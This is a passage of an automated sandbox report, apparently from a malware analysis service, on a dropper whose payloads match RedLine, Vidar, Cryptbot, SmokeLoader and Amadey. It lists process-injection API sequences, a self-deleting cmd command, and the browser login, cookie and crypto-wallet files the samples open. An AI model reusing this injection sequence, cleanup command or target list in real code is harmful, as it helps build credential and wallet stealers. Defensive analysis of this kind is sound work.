                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeMemory written: C:\Users\user\AppData\Local\Temp\B6B5.exe base: 400000 value starts with: 4D5A
                        Contains functionality to inject code into remote processesShow sources
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Creates a thread in another existing process (thread injection)Show sources
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeThread created: C:\Windows\explorer.exe EIP: 4E91930
                        Source: C:\Users\user\AppData\Roaming\ddigjgjThread created: unknown EIP: 7651930
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeThread created: unknown EIP: 5A91930
                        .NET source code references suspicious native API functionsShow sources
                        Source: C169.exe.4.dr, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csReference to suspicious API methods: ('CXGWjLQ8Hp', 'LoadLibrary@kernel32'), ('REpW7ZaJOo', 'GetProcAddress@kernel32')
                        Source: 11.2.A70A.exe.12e0000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 16.0.C169.exe.900000.1.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.0.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.2.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.0.C169.exe.900000.3.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 16.2.C169.exe.900000.0.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.0.C169.exe.990000.2.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.0.C169.exe.990000.5.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: 23.2.C169.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 23.0.C169.exe.990000.7.unpack, Oldening.Listeners/Server.csReference to suspicious API methods: ('ExcludeInfo', 'LoadLibrary@kernel32.dll'), ('GetInfo', 'GetProcAddress@kernel32')
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                        Source: explorer.exe, 00000004.00000000.349854626.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.315345388.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.330878431.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.317252454.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: explorer.exe, 00000004.00000000.315554642.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.350341132.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.332266279.00000000011E0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.442571738.00000000034B0000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.446096328.00000000034B0000.00000002.00020000.sdmp, C169.exe, 00000017.00000002.579526264.0000000001680000.00000002.00020000.sdmp, D375.exe, 0000001A.00000002.602370796.0000000001BB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: explorer.exe, 00000004.00000000.321134099.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.340710494.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.359571061.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A70A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Users\user\AppData\Local\Temp\C169.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Users\user\AppData\Local\Temp\C169.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EE61.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.Design.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E8386 cpuid
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004020E1 GetHandleInformation,GradientFill,GetSystemTimeAsFileTime,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040A8A0 GetProcessHeap,HeapAlloc,_memset,GetTimeZoneInformation,wsprintfA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040A800 GetProcessHeap,HeapAlloc,GetUserNameA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00406760 _memset,_memset,GetVersionExA,LoadLibraryA,WideCharToMultiByte,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,FreeLibrary,
                        Source: C169.exe, 00000017.00000002.605075446.0000000006842000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 23.2.C169.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.A70A.exe.12e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.466738621.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.568172041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.471013875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.472952857.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 2256, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected CryptbotShow sources
                        Source: Yara matchFile source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, type: MEMORY
                        Yara detected Amadey botShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \ElectronCash\wallets\
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: window-state.json
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: info.seco
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: file__0.localstorage
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: multidoge.wallet
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                        Source: A70A.exe, 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: Yara matchFile source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 23.2.C169.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.A70A.exe.12e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.466738621.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.568172041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.471013875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.472952857.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 2256, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected CryptbotShow sources
                        Source: Yara matchFile source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, type: MEMORY
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
